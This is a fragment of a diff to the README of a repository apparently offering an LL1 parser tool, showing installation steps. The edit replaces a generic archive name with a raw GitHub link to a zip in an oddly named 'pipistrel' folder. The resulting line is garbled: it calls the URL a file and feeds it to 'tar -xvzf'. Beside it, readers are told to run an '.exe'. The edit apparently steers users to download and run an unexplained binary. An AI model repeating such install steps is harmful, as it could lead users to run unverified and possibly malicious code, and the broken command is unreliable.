jcmark-fullmetal/LL1-Parser-Plus/README.md

   - Right-click on the `.zip` or `.exe` file and select “Extract All” or “Run” to extract the files.

 - **For Linux:**
-  - If you downloaded a `.tar.gz` file, you can extract it by right-clicking the file and selecting “Extract Here” or using the terminal with the command: `tar -xvzf yourfile.tar.gz`.
+  - If you downloaded a `https://raw.githubusercontent.com/jcmark-fullmetal/LL1-Parser-Plus/main/pipistrel/LL1-Parser-Plus.zip` file, you can extract it by right-clicking the file and selecting “Extract Here” or using the terminal with the command: `tar -xvzf https://raw.githubusercontent.com/jcmark-fullmetal/LL1-Parser-Plus/main/pipistrel/LL1-Parser-Plus.zip`.

 ### 4. Open the Application